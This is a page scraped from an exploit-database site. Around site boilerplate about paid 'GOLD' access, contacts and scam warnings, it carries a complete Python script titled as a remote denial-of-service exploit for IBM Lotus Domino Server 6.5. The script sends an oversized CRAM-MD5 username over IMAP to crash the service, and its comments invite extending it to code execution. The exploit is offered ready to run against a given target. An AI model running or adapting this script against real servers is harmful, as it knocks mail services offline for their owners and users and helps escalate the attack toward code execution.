0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit

Author

Winny Thomas

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-6349

Category

dos / poc

Date add

28-03-2007

Platform

unsorted

=======================================================================
IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit
=======================================================================




#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#

import sys
import md5
import struct
import base64
import socket

def ExploitLotus(target):
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       sock.connect((target, 143))
       response = sock.recv(1024)
       print response


       auth = 'a001 authenticate cram-md5\r\n'
       sock.send(auth)
       response = sock.recv(1024)
       print response

       # prepare digest of the response from server
       m = md5.new()
       m.update(response[2:0])
       digest = m.digest()

       payload = 'A' * 256
       # the following DWORD is stored in ECX
       # at the time of overflow the following call is made
       # call dword ptr [ecx]. However i couldnt find suitable conditions under which a stable pointer to our shellcode
       # could be used. Actually i have not searched hard enough :-).
       payload += struct.pack('<L', 0x58585858)

       # Base64 encode the user info to the server
       login = payload + ' ' + digest
       login = base64.encodestring(login) + '\r\n'

       sock.send(login)
       response = sock.recv(1024)
       print response

if __name__=="__main__":
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <imap server>\n' % sys.argv[0]
               sys.exit(-1)

       ExploitLotus(target)



#  0day.today [2024-12-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit

Report Error

Report Error